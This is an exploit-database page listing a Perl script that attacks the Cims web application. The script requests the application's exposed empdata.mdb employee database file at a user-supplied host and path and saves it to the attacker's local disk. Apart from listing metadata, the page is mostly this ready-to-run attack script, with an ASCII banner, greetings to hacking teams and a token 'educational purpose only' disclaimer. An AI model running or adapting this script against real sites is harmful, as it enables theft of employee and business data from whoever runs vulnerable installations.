[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Cims empdata.mdb Database Disclosure Exploit

Author
Caddy-Dz
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19525
Category
web applications
Date add
07-10-2012
Platform
php
#!/usr/bin/perl -w
#
# Title : Cims empdata.mdb Database Disclosure Exploit
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia[at]hotmail.com
# Category:: WebApps
# Security Risk : High
# Vendor: http://www.simwebsol.com
# Download : http://www.simwebsol.com/cims.zip
#
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers .
#
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility 
# intended for authorized web application pentesting only!


 
 
use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('title Cims empdata.mdb Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
print "[+] Exemple: perl cims.pl 127.0.0.1 /scripts/cims/ \n";
print "[+] Note ! : do not use (http://) and make space between host and path like the exemple";
}

print "\n************************************************************************\n";
print "\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\n";
print "\0     _                   __           __       __                     1\n";
print "\1   /' \            __  /'__`\        /\ \__  /'__`\                   0\n";
print "\0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1\n";
print "\1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0\n";
print "\0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1\n";
print "\1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0\n";
print "\0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1\n";
print "\1                  \ \____/ >> Exploit database separated by exploit   0\n";
print "\0                   \/___/          type (local, remote, DoS, etc.)    1\n";
print "\1                                                                      1\n";
print "\0  [+] Site            : Inj3ct0r.com                                  0\n";
print "\1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1\n";
print "\0                                                                      0\n";
print "\1                    #######################################           1\n";
print "\0                    I'm Caddy-Dz member from Inj3ct0r Team            1\n";
print "\1                    #######################################           0\n";
print "\0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\n";
($TargetIP, $path, $DBFile,) = @ARGV;

$DBFile="empdata.mdb";
my $url = "http://" . $TargetIP . $path . $DBFile;
print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "C:/postempdata.mdb");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to C:/empdata.mdb\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}


#  0day.today [2024-09-20]  #